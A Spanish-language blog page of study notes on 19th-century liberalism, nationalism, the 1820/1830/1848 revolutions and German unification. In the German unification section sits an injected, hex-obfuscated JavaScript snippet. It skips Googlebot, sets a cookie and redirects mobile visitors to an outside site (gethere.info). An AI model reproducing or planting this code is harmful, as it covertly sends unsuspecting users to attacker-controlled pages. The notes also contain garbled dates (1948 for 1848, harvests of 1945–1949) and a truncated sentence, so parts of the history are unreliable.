Home

INTRODUCCIÓN DEL NACIONALISMO Y LIBERALISMO:
 
El siglo 19, es el siglo liberal. La culminación del liberalismo traera con ella la democracia el parlamentarismo y el constitucionalismo. Además, el nacionalismo influirá decisivamente en la creación de nuevos estados en esta centuria.
 
LIBERALISMO Y NACIONALISMO
 
El liberalismo político y el nacionalismo chocarán con los principios de la Europa de la Restauración. Son la reacción ante la Europa artificial surgida en Viena en 1814. la burguesía no puede permitirse una renuncia al poder político que le ha sido otorgado por los principios revolucionarios del siglo anterior.
Igualmente, la Revolución Francesa y Napoleón, despertaron la conciencia nacionalista de algunos estados alemanes, italianos, y de otros, como los polacos.
 
a) El Liberalismo:
 
El liberalismo político tiene su origen en el siglo XVIII, ya Benjamín Constant habla de intelectual, político, económico y religioso, como una misma doctrina que se opone al absolutismo y al despotismo ilustrado.
En el siglo XIX se rompe esta unidad y el liberalismo denominado político acoge la doctrina que defiende la lucha contra el absolutismo restaurado, apoyando los intereses de la burguesía.
El liberalismo francés de tipo político aparece organizado en el consulado y el imperio. En la Restauración los liberales se convierten en oposición y proliferan las sociedades secretas, que realizan una crítica sistemática a los valores que defendía la nueva Europa: monarquía, nobleza y clero.
Llegará al poder en 1830 y defiende los intereses de la alta burguesía provocando la reacción antiorleannista.
A partir de aquí, se expande por Europa occidental convirtiéndose en una fuerza conservadora.
El liberalismo británico es más económico y tiene su culminación en 1832 con Guillermo IV, convertido en monarca constitucional de modo definitivo.
 
Características del Liberalismo:
-Propugna la libertad individual y la libertad de expresión, y surge la defensa de la libertad religiosa, y la aconfesionalidad del estado. Es partidario de las desamortizaciones de los bienes del clero y de una enseñanza laica.
-Todas estas libertades deben plasmarse en una constitución que limite el poder del monarca, en la idea de la soberanía nacional.
-Defiende la separación de los poderes y su autonomía (Montesquieu).
-Defiende la creación de partidos políticos que formarán gobierno cuando consigan los votos mayoritarios.
-Sigue la influencia girondina de la descentralización administrativa. Estamos por lo tanto, ante una sociedad clasista en la que manda el dinero, y que sustituye a los privilegios de cuna. Partiendo de esta premisa, el liberalismo doctrinario va a crear unas bases típicas que contrarrestan las anteriormente analizadas.
-Apoyan la idea del “laissez faire, laissez passer”, esdecir, el sistema económico librecambista que crearáAdam Smith, y las ideas maltusianas de que el obrero va a vivir siempre mal, por lo que se despreocupan de una posible intervención estatal.
-La especial igualdad legal que propugna el liberalismo hace nacer la idea del sufragio censatario.
-El estado liberal creará leyes que protejan la propiedad individual.
 
b) El Nacionalismo:
 
Se manifiesta en muy diferentes formas y deriva en tres conceptos clave:
-Nacionalidad: La forma un grupo humano con un soporte histórico basado en unos componentes o elementos básicos comunes, pero, que no está organizado bajo un gobierno o un estado.
-Nación: Precisa organizarse en unidades políticas estables autónomas, es decir, disponer de un gobierno propio, soberano e independiente. Adopta este sentido tras la Revolución Francesa y ya en el XIX, adquiere todo su contenido.
-Nacionalismo: Es el movimiento, el vehículo o el medio del que se sirve el grupo humano para formar un estado.
 
Orígenes y fuentes del nacionalismo:
El concepto del nacionalismo surgió en la Baja Edad Media, como reacción al feudalismo, y a finales del XVIII, comenzó a concretarse el término de nación.
En Francia se configura el concepto de nación-política, basado en las ideas de Rousseau y en su noción de “voluntad general”, que desembocó en la “soberanía nacional”. Además se configura el propio concepto de nación-política, puesto que ya Sieyes, en 1789, tiene la idea de que “una nación es un grupo de individuos gobernados por una misma ley, y representados por una misma asamblea legislativa”.
Alemania aportó el concepto de nación-cultural, basada en la teoría historicista y romanticista, descubre así, las raíces históricas diferenciadoras de los pueblos y exalta el sentimiento nacional.
Herder en 1784, nombró el volkgeist: “cada pueblo tiene una personalidad colectiva, un alma que se conserva en las tradiciones populares y sobre todo en el idioma que es el que refleja la mentalidad de un pueblo”.
 
Períodos y fases del Nacionalismo:
-Durante el primer tercio del XIX es fundamentalmente intelectual, y acabó siendo antinapoleónico y antiautocrático, puesto que adoptaba una ideología liberal.
-A partir de 1830, nos encontramos ante el período de mayor convulsión nacionalista, sobre todo entre 1859 y 1871.
 
Elemento que definen la personalidad nacional de un pueblo:
-Geográficos: definidos por un territorio bien delimitado.
-Étnicos: definidos por una población con rasgos propios y diferentes.
-Lingüísticos: ya que la lengua aporta la cohesión a la conciencia nacional.
-Una historia y cultura diferenciada de la de los otros colectivos humanos con un pasado y tradiciones propias.
-Religiosos: enmarcados en una unidad religiosa.
-Políticos: ya que deben poseer una autodeterminación política.
-Socioeconómicos: ya que deben haber creado una estructura tanto social como económica, capaz de lograr la prosperidad de ese pueblo.
Pero ninguno de esos factores por sí solo crea una conciencia nacional, ni tampoco es imprescindible la conjunción de todos ellos.
Además, estos mismos elementos pueden actuar en dos direcciones, aparentemente contradictorias, en los pueblos que carecen de nación (fuerza centrípeta o centrífuga).
 
Algunos teóricos del nacionalismo del XIX:
En Alemania destacan J. G. Herder con su obra “Ideas para la filosofía de la Humanidad”; J. G. Fichte, que en sus “Discursos”, a la nación alemana, expresa su concepción de la libertad del individuo en la esfera política, manifestándose como revolucionario demócrata radical, y, por último, Hegel.
En Francia, destaca Rousseau con su concepto de voluntad general.
También debemos mencionar a Ranke, Manzini, strosmajer, C. Rubio y Ors.
BLOQUE II: PLASMACIÓN DE ESTAS IDEOLOGÍAS.
 
1) REVOLUCIONES Y CONTRARREVOLUCIONES:
 
El período comprendido entre 1815 y 1848 se caracteriza por la conjunción de varios fenómenos:
-El ascenso constante burgués.
-La inestabilidad política.
-Las revoluciones liberales.
-El crecimiento económico.
-El inicio de la organización del movimiento obrero.
-.Los conflictos entre el liberalismo democrático y la contrarrevolución conservadora.
Se pueden señalar, a su vez, rasgos generales propios de los movimientos revolucionarios:
-Son revoluciones llevadas a cabo por la burguesía.
-Se producen a causa de un conflicto de intereses, entre la vieja sociedad estamental y la nueva sociedad clasista.
-En un primer momento, su objetivo es la abolición de las relaciones feudales agrarias.
-Introducen en la sociedad una serie de cambios, como libertades cívicas, una igualdad relativa, el constitucionalismo, o el respeto por la propiedad privada.
En la llamada “primavera de los pueblos” se suceden procesos revolucionarios y contrarrevolucionarios que afectan a toda Europa, siendo los más destacas los de 1820, 1830 y 1848.
 
2) LOS GRANDES IMPERIOS Y SU PROBLEMÁTICA:
 
Destacan tres grandes imperios:
-El Otomano: Fundado en el siglo XI, y cuya etapa de esplendor fue entre los siglos XV y XVIII.
-El Austrohúngaro: Gobernado por la casa Austria y con una fuerte hegemonía desde el siglo XV al XIX.
-El Ruso: Fundado en el siglo X, y con la presencia del zar desde 1526.
Poseen todos ellos una serie de problemas que los debilitan y que promueven el surgimiento de los nacionalismos, como son: un inmenso territorio, en el que conviven etnias distintas, con idiomas distintos, y con religiones distintas, que promueven la fuerza centrípeta del nacionalismo y el surgimiento de nuevos estados.
 
3) LAS REVOLUCIONES DE 1820:
 
En 1815 Europa vivió sumergida en un período de conservadurismo. Los principios y doctrinas de la Restauración, arrancaban del pensamiento contrarrevolucionario de Burke, y fueron difundidas por: J. de Maistre, Von Halter, Adam Müller y F. Schelegel entre otros.
Las ideas básicas sobre las que se fundamentaba la Europa de la Restauración eran el legitimismo, la responsabilidad internacional de las potencias, el establecimiento de congresos y la necesidad de intervención.
Sin embargo, los gérmenes de las ideas de 1789 permanecieron vivos, y en torno a 1820, fue capaz de desarrollar un ciclo de revoluciones en el área del Mediterráneo, que empezó en España y se extendió a Portugal, Italia, Grecia y, en 1825, Rusia.
Según R. Koselleck, podemos advertir rasgos comunes en estos episodios:
-La Constitución española de 1812 sirvió de guía y modelo político.
-A excepción de Grecia, la participación del pueblo llano fue mínima.
-Los principios de la Revolución Francesa no crearon verdaderamente situaciones revolucionarias propias.
-El fracaso de estas revoluciones se debió a la intervención extranjera.
 
El caso español empapó al de Portugal y Nápoles, con constituciones que, más tarde, fueron abolidas, al igual que en el resto de Italia.
La revolución griega de 1820 tuvo como único objetivo la independencia frente a los turcos, cuyo dominio se extendía desde el siglo XV. El levantamiento fue preparado en 1820 y se consolidó en 1822, cuando la asamblea nacional griega (Congreso de Epidauro), proclamó la independencia y estableció una Constitución.
La participación extranjera en contra del dominio turco favoreció el proceso.
El Tratado de Adrianópolis de 1829 y el Protocolo de Londres de 1830, impusieron el reconocimiento total de la independencia.
La Revolución decembrista de 1825 en Rusia se manifestó en un intento de imponer un régimen constitucional, tras la muerte del zar Alejandro I, pero su resultado fue el fracaso.
 
4) LA REVOLUCIÓN DE 1830:
 
Nos desplazamos al norte y centro de Europa y como objetivos sobresalían conseguir más cotas de libertad y la independencia.
La chispa revolucionaria prendió en París, con los tres días gloriosos de Julio, que acabaron con la dinastía de los Borbones, y se responde con una política reaccionaria con Carlos X, con la proclamación de “las Ordenanzas de Saint-cloud”, para evitar la radicalización, pero llega al fracaso, y se ofrece la salida de entronizar a Luis Felipe de Orleáns, con una carta pactada, y con un sistema de sufragio censatario y la utilización de los símbolos de 1789.
Las agitaciones obreras de Lyon y París, firmemente castigadas, se sucedieron en 1831 y 1834.
En Bélgica, su anexión a Holanda en 1814, para crear un estado tapón frente a Francia, provocaron un movimiento de separación, que se extendió desde 1829, y permitió proclamar su independencia en octubre de 1830, con una constitución muy liberal en 1831.
Polonia había sido incorporada casi en su totalidad a Rusia en 1815, y en 1830 consiguió la independencia, anexionándose Lituania, pero fue frenado en 1831.
En Italia el objetivo era la liberación de los estados del norte del yugo austriaco en 1831, pero fracasó yManzini tuvo que exiliarse a Francia y fundó las sociedades revolucionarias de “la Joven Italia” y “la Joven Europa”.
También se extendió a varios estados alemanes que consiguieron la abdicación de los soberanos de Brunswick, Sajonia, Hesse y  Hannover, e introdujeron reformas liberales y el sistema constitucional.
ron y consintieron una revisión del sufragio, en la gran “Ley de Reforma” de 1832, que fue la base para una democratización del país.
 
5) LA REVOLUCIÓN DE 1848:
 
La explosión revolucionaria de 1948, “la primavera de los pueblos”, según Hobsbawm, tuvo una mayor transcendencia que las anteriores.
Las ruinas de las cosechas desde 1945 a 1949, llevó pareja el alza de los alimentos básicos y como consecuencia los motines de subsistencia de varios países que prepararon el clímax revolucionario. También se extendió al ámbito industrial, a los ferrocarriles y al mundo financiero.
La chispa de nuevo estalló en París, en febrero yLamartine, proclamó la república con un gobierno provisional moderado, que introdujo reformas políticas y sociales, pero las elecciones de Abril dieron la victoria a los liberales.
La insurrección obrera de Junio sitúa el inicio de la reacción autoritaria de Luis Napoleón Bonaparte, y el establecimiento del II Imperio, tras el golpe de estado de 1851.
En Viena, en marzo se concedió una constitución, y hubieron levantamientos nacionales en Hungría y Bohemia, aplazados.
En Italia había un doble objetivo: la lucha por las libertades políticas en el interior, y la búsqueda de la unidad y de la independencia nacional, que también fracasaron.
En Alemania numerosos estados de la confederación se establecieron, constitucionales, pero se impuso la reacción de Prusia en Berlín y la restauración del Absolutismo.
Ahora sí se conservaron algunas conquistas, como el sufragio universal en Francia, la abolición total del feudalismo en occidente, y la pervivencia de algunas constituciones en algunos estados, junto a la posición preeminente de Piemonte y Prusia, para realizar procesos de unificación política.
Más tarde la Comuna de París de 1871 representa el modelo revolucionario de la clase obrera, frente a la burguesa, más característico del XX, y que para Lenin, será una referencia histórica y servirá de modelo a la revolución rusa.
 
6) LOS PROCESOS NACIONALISTAS EN LA EUROPA DEL XIX:
 
 a) La Unificación Alemana:
 
Los estados germánicos estuvieron integrados desde 962 hasta 1806 en el Sacro Imperio Romano Germánico, divididos en numerosos estados, en los que predominaba un legado cultural común y la lengua germánica.
La campaña napoleónica destruyó esta estructura imperial en 1806, pero volvió a reconfigurarse tras Viena, creándose la Confederación Germánica en 1815, reduciéndose los estados a 39, con cuatro ciudades libres, y el resto monarquías. Existía una Dieta o Asamblea de la Confederación, que dirigía los asuntos alemanes bajo la vigilancia de Austria y Prusia.
La causa liberal del XIX llevó a la unión aduanera ozollverein en 1834, entre Baviera, Hannover, y Sajonia, desplazando a Austria, a favor de Prusia en el control económico.
 
El espíritu nacionalista de la Confederación Germánica (1830-1848):
Desde los fundamentos del Zollverein y delSteuerverein (fiscal), la posición austríaca se configuró como oposición al proyecto. El fermento nacionalista entre 1830-1848 apenas logró desarrollarse más allá del ámbito cultural y del económico.
El fracaso de la revolución del 48 significaba que por el momento:
-Los anhelos nacionalistas acababan subordinados a los recelos despertados por el liberalismo económico.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s